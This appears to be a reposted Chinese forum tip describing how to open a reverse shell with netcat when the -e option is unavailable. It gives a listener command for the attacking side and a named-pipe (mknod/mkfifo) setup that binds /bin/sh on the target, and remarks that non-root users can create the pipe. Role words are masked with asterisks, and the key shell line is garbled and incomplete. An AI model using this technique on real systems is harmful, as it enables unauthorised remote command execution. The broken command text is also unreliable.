[TIP]NC不使用-e选项反弹shell
【转自】http://www.iyunv.com/article/201305/209914.html***方执行:
nc -lnvp 4430 被***方执行:
mknod /tmp/backpipe p
/bin/sh 0/tmp/backpipe
网上查了下mknod命令,说是只能root用户才有权限执行,可是经过测试普通权限的用户也可以创建管道等特殊文件,如果没有权限使用mkfifo /tmp/backpipe也可以创建一个管道。
页:
[1]